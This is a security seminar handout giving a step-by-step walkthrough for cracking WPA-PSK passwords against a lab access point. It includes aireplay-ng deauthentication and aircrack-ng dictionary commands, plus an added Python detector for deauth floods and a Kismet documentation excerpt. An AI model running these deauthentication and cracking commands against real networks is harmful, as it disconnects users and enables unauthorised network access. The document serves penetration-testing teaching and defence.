Wireless Penetration Testing: Cracking WPA-PSK
Security Seminar by:

Edward Brian Drumheller Jr.
Joseph Allan Krug Esquire
Justin Thomas Lewis


Preparation

For this seminar we are using a bootable Linux CD-ROM distribution, BackTrack 3 Beta (14-12-2007). This is a fully operational operating system that boots from a CD. To follow this seminar you will need a CD-R drive and a CD-R or CD-RW disc on which to burn the image file. Go to http://www.remote-exploit.org/backtrack_download.html to find the image file on various mirror websites. Once you have the image (the file is 700 MB, so it can take a while to download), burn it to a CD. If you do not have a program that can do this, download one such as http://cdburnerxp.se/

Once finished, shut your computer down and restart. You may need to go into your BIOS to change the default boot order so that the CD-ROM boots before your hard drive. Pay attention when your system first starts: there should be a key to enter the BIOS, often called "setup". Inside, find where you can switch the boot order, commonly under "boot". Save the settings and exit.

Your system should now restart.

If prompted, press any key to boot the live disc.

When asked, boot into the KDE option.

Once the desktop loads, follow these directions.

Open a terminal window and run the command "wget http://eddrumheller.com/pen/word.lst". This file will be downloaded to your home directory and used later as the dictionary file for aircrack-ng.

 

 

Cracking WPA-PSK

 

1.     Open a terminal window and run the command "iwconfig"

2.     Write down the interface that has wireless extensions (it is referred to as <wirelessAdapter> below)

3.     Make sure the mode of the card is set to Monitor

a.     If the mode is Managed, run the command "iwconfig <wirelessAdapter> mode monitor". Most drivers only accept a mode change while the interface is down, so bring it down first with "ifconfig <wirelessAdapter> down" and back up afterwards.

4.     Open the Kismet configuration file by running the command "vi /usr/local/etc/kismet.conf"

Change line 27 "# source=none,none,addme" to "source=<kismetDriver>,<wirelessAdapter>,<wireless>" (the key is "source", as on the commented line; the three fields are the capture source type from the Kismet documentation below, the interface name, and a free-form name for this source).



Run Kismet by running the command "kismet" in the terminal. Startup output scrolls by, and then the Kismet curses interface is displayed in the terminal.

a.     Press h to view the help menu

b.     Press x to close any pop-up menu

c.     Press s to bring up the sort menu

d.     Press b to sort by BSSID

e.     Highlight the network named "dd-wrt" (the seminar's test access point)

f.     Press Enter to view its information

g.     Write down the BSSID and channel number.

h.     Close the Kismet terminal window (mandatory: Kismet keeps hopping channels and would interfere with the capture in the next step)



 

 

5.     Open a new terminal and type the command "airodump-ng -c <channel of AP> --bssid <AP's bssid> -w capture eth0" (the handout uses eth0 as the wireless interface; substitute the interface you wrote down in step 2)

a.     Leave this window open; this program will be capturing the handshake.

6.     Open another terminal and type "aireplay-ng -0 5 -a <AP's bssid> -c <client's MAC address> eth0" to send deauthentication packets to a client that is already authenticated, so that it reconnects and performs the WPA four-way handshake again.

7.     View the aireplay-ng and airodump-ng terminals side by side. If the deauthentication worked, "WPA handshake: <BSSID>" will be displayed in the upper right-hand corner of airodump-ng.

a.     The capture containing the handshake is now stored in your home directory (as capture-01.cap or similar, since airodump-ng numbers its output files)

8.     Crack the handshake with aircrack-ng using the command

aircrack-ng -w <location of a dictionary file> -b <AP's bssid> capture*.cap

Note: the key will be displayed once it is found. Only passphrases present in the dictionary file can be found this way, which is why a long, random WPA passphrase defeats this attack.
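Step 6 above is the traffic a wireless IDS watches for. As an added example, not part of the seminar handout: a small Python detector that parses raw 802.11 management frames and flags any sender/receiver pair that emits a burst of deauthentication or disassociation frames. The MAC addresses, timestamps and the five-frame threshold are constructed for the illustration.

```python
import struct
from collections import defaultdict

# Constructed sample MACs, not from the handout. Frame Control byte 0 encodes
# version/type/subtype: 0x80 = beacon, 0xC0 = deauthentication, 0xA0 = disassociation.
AP = bytes.fromhex("001122334455")
CLIENT = bytes.fromhex("66778899aabb")
DEAUTH, DISASSOC = 0x0C, 0x0A

def mgmt_frame(fc0, dst, src, bssid, seq, body=b""):
    """Build a raw 802.11 management frame (24-byte header + body, no radiotap)."""
    return struct.pack("<BBH", fc0, 0, 0) + dst + src + bssid + struct.pack("<H", seq << 4) + body

def parse_frame(raw):
    """Return (type, subtype, addr1, addr2, addr3, body) from a raw frame, or None if truncated."""
    if len(raw) < 24:
        return None
    return (raw[0] >> 2) & 0x3, raw[0] >> 4, raw[4:10], raw[10:16], raw[16:22], raw[24:]

def find_deauth_bursts(frames, threshold=5, window=2.0):
    """frames: list of (timestamp_seconds, raw_frame).  Returns {(src, dst): peak count} for each
    sender/receiver pair that sent >= threshold deauth/disassoc frames within any window-second span.
    A real disconnect is one or two frames; a flood is dozens, so the count is the signal."""
    seen = defaultdict(list)
    for ts, raw in frames:
        parsed = parse_frame(raw)
        if parsed is None:
            continue
        ftype, subtype, dst, src, _bssid, body = parsed
        if ftype == 0 and subtype in (DEAUTH, DISASSOC) and len(body) >= 2:
            seen[(src.hex(":"), dst.hex(":"))].append(ts)
    alerts = {}
    for pair, stamps in seen.items():
        stamps.sort()
        for i in range(len(stamps)):
            j = i
            while j < len(stamps) and stamps[j] - stamps[i] <= window:
                j += 1
            if j - i >= threshold:
                alerts[pair] = max(alerts.get(pair, 0), j - i)
    return alerts

# Constructed capture: a beacon, one ordinary client-initiated deauth (reason 3, "leaving"),
# then five deauths to the client within half a second, all claiming to come from the AP.
SAMPLE = [
    (0.0, mgmt_frame(0x80, b"\xff" * 6, AP, AP, 1)),
    (1.0, mgmt_frame(0xC0, AP, CLIENT, AP, 2, struct.pack("<H", 3))),
] + [(10.0 + 0.1 * i, mgmt_frame(0xC0, CLIENT, AP, AP, 100 + i, struct.pack("<H", 7)))
     for i in range(5)]
```

On a real capture the frames would come from a monitor-mode pcap with the radiotap header stripped; the single client-initiated deauth in the sample stays below the threshold and is not reported.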


 

Directions to connect to an AP secured with WPA in BackTrack2

To connect to WPA, a little bit of work is needed:

* Creating a conf file

* Running wpa_supplicant

Creating the .conf file:

Open your favourite editor and add the following:

            network={
                ssid="youraccesspointname"
                psk="youraccesspointspassword"
            }

Save this in /root as wpa.conf. The file holds the passphrase in plain text, so keep it readable by root only (chmod 600 /root/wpa.conf).

Running wpa_supplicant:

First run this command:

wpa_supplicant -i eth0 -c wpa.conf        (change eth0 to your adaptor)

-i = specifies the interface to use

-c = specifies the location of the .conf file

Some drivers also need -D <driver> (for example -D wext) to select the driver backend.

This should bring up a message stating that the connection has been successful.

It is important not to close this shell.

Then open another shell and type

dhcpcd eth0        (change eth0 to your adaptor)

Test the connection.

 


KISMET Documentation

12. Capture Sources

    A capture source in Kismet is anything which provides packets to the Kismet
    engine.  Capture sources define the underlying engine needed to capture
    data from the interface, how to change channel, and how to enter rfmon
    mode.  It is necessary to tell Kismet what specific type of card you use
    because different drivers often use different methods to report information
    and enter monitor mode.

    Source type     Cards               OS          Driver
    --------------- ------------------- ----------- -------------------------
    acx100          TI ACX100           Linux       ACX100
                    http://acx100.sourceforge.net/
                    ACX100 drivers handle the 22mbit cards branded by D-Link
                     and others.

    admtek          ADMTek              Linux       ADMTek
                    http://www.latinsud.com/adm8211/        (Patches)
                    http://aluminum.sourmilk.net/adm8211/   (GPL driver)
                    ADMTek drivers used in many consumer 802.11b cards. With
                     the patches above, quasi-rfmon is possible - these cards
                     appear to be almost entirely software controlled and
                     always in a rfmon-like state.  This card WILL BROADCAST
                     while in rfmon, rendering the sniffer visible.
                    The fully GPL drivers are supported, in addition to the
                     hacks to the non-free drivers.

    airpcap         Airpcap USB         cygwin      CACE Tech
                    http://www.cacetech.com/products/airpcap.htm
                    The CACE AirPcap USB device allows native capture on
                     Win32/Cygwin.
                    The explicit airpcap source expects the Win32/Cygwin
                     interface name.  This should be used once the source
                     is identified via airpcap_ask or if multiple simultaneous
                     sources are required.

    airpcap_ask     Airpcap USB         cygwin      CACE Tech
                    http://www.cacetech.com/products/airpcap.htm
                    The CACE AirPcap USB device allows native capture on
                     Win32/Cygwin.
                    The airpcap_ask source lists available airpcap devices
                     and allows the user to pick interactively.
                    The 'capture interface' field is irrelevant and can be
                     filled with any value (for example, 'dummy')

    atmel_usb       Atmel-USB           Linux       Berlios-Atmel
                    http://at76c503a.berlios.de/
                    These drivers work ONLY on USB cards (Sorry, no PCMCIA
                     support).  Monitor mode support is limited and "faked"
                     by bypassing part of the firmware and parsing packets
                     directly, and is likely to not report all of the
                     frames.
                    This card MAY BROADCAST while in rfmon, rendering the
                     sniffer visible.
                    It appears that this card may be only formatting the
                     beacons as an 802.11 stream, which means you likely
                     will not see data frames, rendering most IDS functions,
                     IP discovery, and data logging unavailable.

    ath5k           Atheros             Linux       Kernel/Madwifi
                    http://madwifi.org
                    Based on the OpenBSD OpenHAL, the Ath5k drivers are the
                     future of Atheros support and will be mainlined into the
                     Linux kernel.

    ath5k_a         Atheros             Linux       Kernel/Madwifi
                    http://madwifi.org
                    Ath5k source for 11a only

    ath5k_ag        Atheros             Linux       Kernel/Madwifi
                    http://madwifi.org
                    Ath5k source for 11a/11g

    bcm43xx         Broadcom            Linux       BCM43XX
                    http://bcm43xx.berlios.de, kernel
                    Linux native broadcom drivers incorporated into modern
                     kernels.

    b43             Broadcom            Linux
                    B43 broadcom drivers for current Broadcom devices in
                     Linux kernels

    b43legacy       Broadcom            Linux
                    B43 broadcom drivers for legacy Broadcom devices in
                     Linux kernels

    cisco           Aironet 340,350     Linux       Kernel 2.4.10 - 2.4.19
                    Standard Cisco cards in Linux.  Works only with
                     the Linux kernel drivers, not the drivers found in
                     pcmcia-cs.
                    The drivers found on the cisco.com site can be patched
                     with the files from the Kismet download site to add
                     monitor mode with channel control, HOWEVER these drivers
                     are extremely buggy for normal use and work only with
                     the 2.4 kernel tree.
                    The cisco drivers currently do not enter rfmon mode
                     correctly, so channel control is not available.  The
                     firmware will hop to whatever channel it feels like
                     hopping to, when it feels like hopping.

    cisco_wifix     Aironet 340,350     Linux       Kernel 2.4.20+, CVS
                    http://sourceforge.net/projects/airo-linux/
                    Capture interface:  'ethX:wifiX'
                    Kernel 2.4.20+ and CVS drivers use ethX for normal mode
                     and wifiX for monitor mode.  Kismet needs to know both
                     devices, which may not necessarily be the same number,
                     for example 'eth1:wifi0'.
                    Linux kernel 2.4.20 and 2.4.21 have highly unstable cisco
                     drivers and should be avoided.
                    The cisco drivers currently do not enter rfmon mode
                     correctly, so channel control is not available.  The
                     firmware will hop to whatever channel it feels like
                     hopping to, when it feels like hopping.

    darwin          OSX native cards    OSX/Darwin  OSX
                    Supports both Broadcom and Atheros Airport-Extreme cards.
                    When using a Broadcom based card, it may be necessary to
                     enable rfmon on the device for the first time using another
                     program.
                    When using an Atheros based card, 802.11a may also be supported
                     by adding a 'sourcechannels' line to kismet.conf.

    hostap          Prism/2             Linux       HostAP 0.4
                    http://hostap.epitest.fi/
                    HostAP drivers drive the Prism/2 chipset in access point
                     mode, but also can drive the cards in client and monitor
                     modes.  The HostAP drivers seem to change how they go
                     into monitor mode fairly often, but this source should
                     manage to get them going.

    ipw2100         Intel/Centrino      Linux       ipw2100-0.44+
                    http://ipw2100.sourceforge.net/
                    The Linux IPW2100/Centrino drivers for 802.11b cards
                    now support rfmon, so here's support for them.  They act
                    more or less like any other wireless interface would.

    ipw2200         Intel/Centrino      Linux       ipw2200-1.0.4+
                    http://ipw2200.sourceforge.net/
                    The Linux IPW2200/Centrino drivers for 802.11bg cards
                    support rfmon as of 1.0.4 and firmware 2.3.
                    Signal level reporting requires radiotap be turned on
                    in the makefile while compiling the driver.  Noise levels
                    are not reported.

    ipw2915         Intel/Centrino      Linux       ipw2200-1.0.4+
                    http://ipw2200.sourceforge.net/
                    The Linux IPW2200/Centrino drivers for 802.11bga cards
                    support rfmon as of 1.0.4 and firmware 2.3.
                    This is the same as ipw2200 but defaults to scanning the
                    802.11a channel range in addition to 802.11b/g.
                    Signal level reporting requires radiotap be turned on
                    in the makefile while compiling the driver.  Noise levels
                    are not reported.

    ipw3945         Intel/Centrino      Linux       ipw3945
                    http://ipw3945.sourceforge.net/
                    The Linux IPW3945/Centrino drivers for Intel Core
                    802.11bga cards.

    ipwlivetap      Intel/Centrino      Linux       ipw2200/3945
                    http://ipw2200.sourceforge.net/
                    http://ipw3945.sourceforge.net/
                    The ipw3945 and patched ipw2200 drivers support a
                    special mode which allows monitor-mode style sniffing
                    while remaining associated.  Channel hopping is not
                    possible, as the card is still associated to a